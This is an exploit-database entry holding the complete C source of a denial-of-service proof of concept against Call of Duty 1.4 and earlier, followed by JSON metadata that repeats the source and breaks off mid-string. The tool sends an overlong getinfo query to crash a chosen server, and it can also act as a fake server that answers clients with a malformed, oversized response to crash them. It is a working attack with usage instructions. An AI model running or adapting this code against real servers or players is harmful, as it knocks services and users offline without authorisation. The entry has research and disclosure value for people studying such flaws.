ID 1337DAY-ID-5878 Type zdt Reporter Luigi Auriemma Modified 2004-09-05T00:00:00
Description
Exploit for unknown platform in category dos / poc
=============================================
Call of Duty <= 1.4 Denial of Service Exploit
=============================================
/* winerr.h */
/*
Header file used for manage errors in Windows
It support socket and errno too
(this header replace the previous sock_errX.h)
*/
#include <string.h>
#include <errno.h>
void std_err(void) {
char *error;
switch(WSAGetLastError()) {
case 10004: error = "Interrupted system call"; break;
case 10009: error = "Bad file number"; break;
case 10013: error = "Permission denied"; break;
case 10014: error = "Bad address"; break;
case 10022: error = "Invalid argument (not bind)"; break;
case 10024: error = "Too many open files"; break;
case 10035: error = "Operation would block"; break;
case 10036: error = "Operation now in progress"; break;
case 10037: error = "Operation already in progress"; break;
case 10038: error = "Socket operation on non-socket"; break;
case 10039: error = "Destination address required"; break;
case 10040: error = "Message too long"; break;
case 10041: error = "Protocol wrong type for socket"; break;
case 10042: error = "Bad protocol option"; break;
case 10043: error = "Protocol not supported"; break;
case 10044: error = "Socket type not supported"; break;
case 10045: error = "Operation not supported on socket"; break;
case 10046: error = "Protocol family not supported"; break;
case 10047: error = "Address family not supported by protocol family"; break;
case 10048: error = "Address already in use"; break;
case 10049: error = "Can't assign requested address"; break;
case 10050: error = "Network is down"; break;
case 10051: error = "Network is unreachable"; break;
case 10052: error = "Net dropped connection or reset"; break;
case 10053: error = "Software caused connection abort"; break;
case 10054: error = "Connection reset by peer"; break;
case 10055: error = "No buffer space available"; break;
case 10056: error = "Socket is already connected"; break;
case 10057: error = "Socket is not connected"; break;
case 10058: error = "Can't send after socket shutdown"; break;
case 10059: error = "Too many references, can't splice"; break;
case 10060: error = "Connection timed out"; break;
case 10061: error = "Connection refused"; break;
case 10062: error = "Too many levels of symbolic links"; break;
case 10063: error = "File name too long"; break;
case 10064: error = "Host is down"; break;
case 10065: error = "No Route to Host"; break;
case 10066: error = "Directory not empty"; break;
case 10067: error = "Too many processes"; break;
case 10068: error = "Too many users"; break;
case 10069: error = "Disc Quota Exceeded"; break;
case 10070: error = "Stale NFS file handle"; break;
case 10091: error = "Network SubSystem is unavailable"; break;
case 10092: error = "WINSOCK DLL Version out of range"; break;
case 10093: error = "Successful WSASTARTUP not yet performed"; break;
case 10071: error = "Too many levels of remote in path"; break;
case 11001: error = "Host not found"; break;
case 11002: error = "Non-Authoritative Host not found"; break;
case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break;
case 11004: error = "Valid name, no data record of requested type"; break;
default: error = strerror(errno); break;
}
fprintf(stderr, "\nError: %s\n", error);
exit(1);
}
/* codboom.c */
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN32
#include <winsock.h>
#include <io.h>
#include <malloc.h>
#include "winerr.h"
#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif
#define VER "0.1"
#define BUFFSZ 2048
#define PORT 28960
#define TIMEOUT 3
#define INFO "\xff\xff\xff\xff" "getinfo xxx\n"
#define BOOM "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
// must be major than 1023 bytes
#define SVBOF "\xff\xff\xff\xff" "getinfo %s\n"
#define CLBOF "\xff\xff\xff\xff" \
"%sResponse\n" \
"\\g_gametype\\dm" \
"\\gamename\\Call of Duty" \
"\\mapname\\mp_carentan" \
"\\protocol\\5" \
"\\scr_friendlyfire\\0" \
"\\scr_killcam\\0" \
"\\shortversion\\1.4" \
"\\sv_allowAnonymous\\0" \
"\\sv_floodProtect\\1" \
"\\sv_hostname\\Crash" \
"\\sv_maxclients\\26" \
"\\sv_maxPing\\0" \
"\\sv_maxRate\\10000" \
"\\sv_minPing\\0" \
"\\sv_privateClients\\0" \
"\\sv_punkbuster\\1" \
"\\sv_pure\\1" \
"\\pswrd\\0" \
"\\mod\\1" \
"\\crash\\%s"
void show_info(u_char *buff);
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
int sd,
len,
psz,
on = 1,
type;
u_short port = PORT;
u_char buff[BUFFSZ + 1];
struct sockaddr_in peer;
setbuf(stdout, NULL);
fputs("\n"
"Call of Duty <= 1.4 server/client shutdown "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\nUsage: %s <attack> [port(%d)]\n"
"\n"
"Attack:\n"
" c = broadcast clients shutdown\n"
" s = server shutdown\n"
" You must add the IP or the hostname of the server after the 's'.\n"
"\n"
"Some usage examples:\n"
" codboom c listens on port %d for clients\n"
" codboom c 1234 listens on port 1234\n"
" codboom s 192.168.0.1 tests the server 192.168.0.1 on port %d\n"
" codboom s codserver 1234 tests the server codserver on port 1234\n"
"\n", argv[0], PORT, PORT, PORT);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
type = argv[1][0];
if(type == 's') {
if(argc < 3) {
printf("\n"
"Error: you must specify the server IP or hostname.\n"
" Example: %s s localhost\n"
"\n", argv[0]);
exit(1);
}
peer.sin_addr.s_addr = resolv(argv[2]);
if(argc > 3) port = atoi(argv[3]);
printf("\n- Target %s:%hu\n",
inet_ntoa(peer.sin_addr),
port);
} else if(type == 'c') {
peer.sin_addr.s_addr = INADDR_ANY;
if(argc > 2) port = atoi(argv[2]);
printf("\n- Listen on port %d\n", port);
} else {
fputs("\n"
"Error: Wrong type of chosen attack.\n"
" You can choose between 2 types of attacks, passive versus clients with\n"
" 'c' or versus servers with 's'\n"
"\n", stdout);
exit(1);
}
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
psz = sizeof(peer);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
if(type == 's') {
fputs("- Request informations\n", stdout);
if(sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(timeout(sd) < 0) {
fputs("\n"
"Error: socket timeout, probably the server is not online or the port is wrong\n"
"\n", stdout);
exit(1);
}
len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
if(len < 0) std_err();
buff[len] = 0x00;
show_info(buff);
fputs("- Send BOOM packet\n", stdout);
len = sprintf(buff, SVBOF, BOOM);
if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(timeout(sd) < 0) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
if(len < 0) std_err();
buff[len] = 0x00;
printf("\n"
"Server doesn't seem to be vulnerable, the following is the answer received:\n"
"\n%s\n\n", buff);
}
} else {
if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
< 0) std_err();
if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
fputs(" Clients:\n", stdout);
for(;;) {
len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
if(len < 0) std_err();
buff[len] = 0x00;
printf("%16s:%hu -> %s\n",
inet_ntoa(peer.sin_addr),
ntohs(peer.sin_port),
buff);
if(!memcmp(buff + 4, "getinfo", 7)) {
len = sprintf(buff, CLBOF, "info", BOOM);
} else {
len = sprintf(buff, CLBOF, "status", BOOM);
}
if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
}
}
close(sd);
return(0);
}
void show_info(u_char *buff) {
int nt = 1;
u_char *string;
while((string = strchr(buff, '\\'))) {
*string = 0x00;
if(!nt) {
printf("%30s: ", buff);
nt++;
} else {
printf("%s\n", buff);
nt = 0;
}
buff = string + 1;
}
printf("%s\n", buff);
}
int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}
u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)(hp->h_addr);
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
# 0day.today [2018-04-04] #
{"published": "2004-09-05T00:00:00", "id": "1337DAY-ID-5878", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:14:26", "bulletin": {"published": "2004-09-05T00:00:00", "id": "1337DAY-ID-5878", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.5, "modified": "2016-04-20T02:14:26", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P/"}}, "hash": "a1a0e209ab5cb76afc4e6cfa3a2dff1dba7dc7c7e95cf3476a792e3c18afd3cd", "description": "Exploit for unknown platform in category dos / poc", "type": "zdt", "lastseen": "2016-04-20T02:14:26", "edition": 1, "title": "Call of Duty <= 1.4 Denial of Service Exploit", "href": "http://0day.today/exploit/description/5878", "modified": "2004-09-05T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/5878", "references": [], "reporter": "Luigi Auriemma", "sourceData": "=============================================\r\nCall of Duty <= 1.4 Denial of Service Exploit\r\n=============================================\r\n\r\n\r\n/* winerr.h */\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n/* codboom.c */\r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include <io.h>\r\n #include <malloc.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netdb.h>\r\n#endif\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define BUFFSZ 2048\r\n#define PORT 28960\r\n#define TIMEOUT 3\r\n#define INFO \"\\xff\\xff\\xff\\xff\" \"getinfo xxx\\n\"\r\n#define BOOM \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\r\n // must be major than 1023 bytes\r\n#define SVBOF \"\\xff\\xff\\xff\\xff\" \"getinfo %s\\n\"\r\n#define CLBOF \"\\xff\\xff\\xff\\xff\" \\\r\n \"%sResponse\\n\" \\\r\n \"\\\\g_gametype\\\\dm\" \\\r\n \"\\\\gamename\\\\Call of Duty\" \\\r\n \"\\\\mapname\\\\mp_carentan\" \\\r\n \"\\\\protocol\\\\5\" \\\r\n \"\\\\scr_friendlyfire\\\\0\" \\\r\n \"\\\\scr_killcam\\\\0\" \\\r\n \"\\\\shortversion\\\\1.4\" \\\r\n \"\\\\sv_allowAnonymous\\\\0\" \\\r\n \"\\\\sv_floodProtect\\\\1\" \\\r\n \"\\\\sv_hostname\\\\Crash\" \\\r\n \"\\\\sv_maxclients\\\\26\" \\\r\n \"\\\\sv_maxPing\\\\0\" \\\r\n \"\\\\sv_maxRate\\\\10000\" \\\r\n \"\\\\sv_minPing\\\\0\" \\\r\n \"\\\\sv_privateClients\\\\0\" \\\r\n \"\\\\sv_punkbuster\\\\1\" \\\r\n \"\\\\sv_pure\\\\1\" \\\r\n \"\\\\pswrd\\\\0\" \\\r\n \"\\\\mod\\\\1\" \\\r\n \"\\\\crash\\\\%s\"\r\n\r\n\r\n\r\nvoid show_info(u_char *buff);\r\nint timeout(int sock);\r\nu_long resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n int sd,\r\n len,\r\n psz,\r\n on = 1,\r\n type;\r\n u_short port = PORT;\r\n u_char buff[BUFFSZ + 1];\r\n struct sockaddr_in peer;\r\n\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"Call of Duty <= 1.4 server/client shutdown \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: aluigi@altervista.org\\n\"\r\n \"web: http://aluigi.altervista.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 2) {\r\n printf(\"\\nUsage: %s <attack> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Attack:\\n\"\r\n \" c = broadcast clients shutdown\\n\"\r\n \" s = server shutdown\\n\"\r\n \" You must add the IP or the hostname of the server after the 's'.\\n\"\r\n \"\\n\"\r\n \"Some usage examples:\\n\"\r\n \" codboom c listens on port %d for clients\\n\"\r\n \" codboom c 1234 listens on port 1234\\n\"\r\n \" codboom s 192.168.0.1 tests the server 192.168.0.1 on port %d\\n\"\r\n \" codboom s codserver 1234 tests the server codserver on port 1234\\n\"\r\n \"\\n\", argv[0], PORT, PORT, PORT);\r\n exit(1);\r\n }\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif \r\n\r\n type = argv[1][0];\r\n if(type == 's') {\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Error: you must specify the server IP or hostname.\\n\"\r\n \" Example: %s s localhost\\n\"\r\n \"\\n\", argv[0]);\r\n exit(1);\r\n }\r\n peer.sin_addr.s_addr = resolv(argv[2]);\r\n if(argc > 3) port = atoi(argv[3]);\r\n printf(\"\\n- Target %s:%hu\\n\",\r\n inet_ntoa(peer.sin_addr),\r\n port);\r\n\r\n } else if(type == 'c') {\r\n peer.sin_addr.s_addr = INADDR_ANY;\r\n if(argc > 2) port = atoi(argv[2]);\r\n printf(\"\\n- Listen on port %d\\n\", port);\r\n\r\n } else {\r\n fputs(\"\\n\"\r\n \"Error: Wrong type of chosen attack.\\n\"\r\n \" You can choose between 2 types of attacks, passive versus clients with\\n\"\r\n \" 'c' or versus servers with 's'\\n\"\r\n \"\\n\", stdout);\r\n exit(1);\r\n }\r\n\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n psz = sizeof(peer);\r\n\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n\r\n if(type == 's') {\r\n fputs(\"- Request informations\\n\", stdout);\r\n if(sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n if(timeout(sd) < 0) {\r\n fputs(\"\\n\"\r\n \"Error: socket timeout, probably the server is not online or the port is wrong\\n\"\r\n \"\\n\", stdout);\r\n exit(1);\r\n }\r\n len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);\r\n if(len < 0) std_err();\r\n buff[len] = 0x00;\r\n show_info(buff);\r\n\r\n fputs(\"- Send BOOM packet\\n\", stdout);\r\n len = sprintf(buff, SVBOF, BOOM);\r\n if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n\r\n if(timeout(sd) < 0) {\r\n fputs(\"\\nServer IS vulnerable!!!\\n\\n\", stdout);\r\n } else {\r\n len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);\r\n if(len < 0) std_err();\r\n buff[len] = 0x00;\r\n printf(\"\\n\"\r\n \"Server doesn't seem to be vulnerable, the following is the answer received:\\n\"\r\n \"\\n%s\\n\\n\", buff);\r\n }\r\n } else {\r\n if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))\r\n < 0) std_err();\r\n if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n fputs(\" Clients:\\n\", stdout);\r\n for(;;) {\r\n len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);\r\n if(len < 0) std_err();\r\n buff[len] = 0x00;\r\n\r\n printf(\"%16s:%hu -> %s\\n\",\r\n inet_ntoa(peer.sin_addr),\r\n ntohs(peer.sin_port),\r\n buff);\r\n\r\n if(!memcmp(buff + 4, \"getinfo\", 7)) {\r\n len = sprintf(buff, CLBOF, \"info\", BOOM);\r\n } else {\r\n len = sprintf(buff, CLBOF, \"status\", BOOM);\r\n }\r\n if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n }\r\n }\r\n\r\n close(sd);\r\n return(0);\r\n}\r\n\r\n\r\n\r\n\r\n\r\nvoid show_info(u_char *buff) {\r\n int nt = 1;\r\n u_char *string;\r\n\r\n while((string = strchr(buff, '\\\\'))) {\r\n *string = 0x00;\r\n if(!nt) {\r\n printf(\"%30s: \", buff);\r\n nt++;\r\n } else {\r\n printf(\"%s\\n\", buff);\r\n nt = 0;\r\n }\r\n buff = string + 1;\r\n }\r\n printf(\"%s\\n\", buff);\r\n}\r\n\r\n\r\n\r\n\r\nint timeout(int sock) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n int err;\r\n\r\n tout.tv_sec = TIMEOUT;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n err = select(sock + 1, &fd_read, NULL, NULL, &tout);\r\n if(err < 0) std_err();\r\n if(!err) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\n\r\nu_long resolv(char *host) {\r\n struct hostent *hp;\r\n u_long host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u_long *)(hp->h_addr);\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "50149f6fc55c0ce9a36b21450f566a6d", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a997313577ce64f57e6c6891c2c95450", "key": "sourceHref"}, {"hash": "396ff4f9c9e83963eb0a6caff50a290f", "key": "sourceData"}, {"hash": "5a856d8508314549fc011ddb2462253e", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "939ad61322c6011a78b807d828c2caef", "key": "description"}, {"hash": "619318fadde833ee77a53ae1fee56d32", "key": "published"}, {"hash": "888babac088d40ba4e1d76e7b342e511", "key": "title"}, {"hash": "619318fadde833ee77a53ae1fee56d32", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category dos / poc", "hash": "867712d10f803971bb0df2d890f991eda71242aa898886e93531952350ae1320", "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-04-04T17:34:04"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-28960", "1337DAY-ID-19942"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806154"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12773", "SECURITYVULNS:DOC:28856", "SECURITYVULNS:VULN:5878", "SECURITYVULNS:DOC:10123", "SECURITYVULNS:VULN:3512"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:118743"]}, {"type": "exploitdb", "idList": ["EDB-ID:38114"]}, {"type": "htbridge", "idList": ["HTB23127"]}], "modified": "2018-04-04T17:34:04"}, "vulnersScore": 0.3}, "type": "zdt", "lastseen": "2018-04-04T17:34:04", "edition": 2, "title": "Call of Duty <= 1.4 Denial of Service Exploit", "href": "https://0day.today/exploit/description/5878", "modified": "2004-09-05T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/5878", "references": [], "reporter": "Luigi Auriemma", "sourceData": "=============================================\r\nCall of Duty <= 1.4 Denial of Service Exploit\r\n=============================================\r\n\r\n\r\n/* winerr.h */\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = 